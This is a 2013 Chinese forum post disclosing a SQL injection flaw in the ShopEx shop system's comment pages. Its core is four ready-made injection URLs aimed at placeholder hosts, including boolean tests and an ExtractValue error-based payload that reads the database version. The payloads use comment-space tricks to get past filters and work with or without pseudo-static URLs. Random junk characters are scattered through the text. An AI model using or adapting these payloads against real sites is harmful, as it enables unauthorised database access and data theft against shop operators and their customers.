注入漏洞是一种经典的漏洞类型了,自从上次跟基友深聊了注入,我对注入的认识又提升了一个高度,在我看来不可以注入的地方,TMD的竟然可以注入,注入攻击最早出现了1998年,貌似是,记不清了。10多年了,依然存在,虽然比以前出现量少了,但不得不用到的一种攻击技术…/ |9 o& S+ r& `' {3 ^0 H
9 N9 ~( y4 W: G- [3 h7 A, w' _好吧,我扯远了~~5 d8 @/ g3 N5 ]$ ?3 [" V% A- [
其实注入不仅仅出现在动态页面上,难道伪静态后就不能注入了吗?NO~) m* o c2 q2 K1 _* L) v
不扯了,直接说主题吧,shopex网店系统注入漏洞。注入点如下:
6 Z; h2 g5 p/ G9 ] u6 W2 g/ d& `0 ~ q5 R! m6 o
http://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html
; S, n, u; L( a. j r) {4 ~* J
# B- R3 z' T; O; vhttp://www.x.com/comment-8967′/**/and/**/ExtractValue(0×64,concat(0×01,(select/**/@@version)))/**/order/**/by/**/’1-ask-commentlist.html: M7 R; }) p; C$ P4 [
$ z* v6 Z8 B0 c9 `+ t1 C, \% L0 Ghttp://www.x.cn/index.php?comment-822′/**/and/**/’1′=’1-ask-commentlist.html! F+ P' }5 B u' y X1 l1 p
, d& A- F' {# S% p" L; ihttp://demo.x.com.cn/485/index.php?comment-190′/**/and/**/’1′=’1-ask-commentlist.html
1 c4 f" u( a, o' n" l& S1 S" h0 A+ E- L& ^/ }
2 g* F& I0 r( b/ q
一个是网站未开启伪静态的注入,一个是网站开启伪静态后的注入,以及是否屏蔽错误回显的2X2=4种情况。3 N! H& ^$ ]5 H6 H( J3 c
如何注入就不多说了,10多年的东西了…不会也会了…) _& I* G" y* _! _: k# l% G
+ J3 G% k. E' D' Z0 f: w- e9 {1 y
|
发表于 2013-2-4 16:20:04
收藏
支持
反对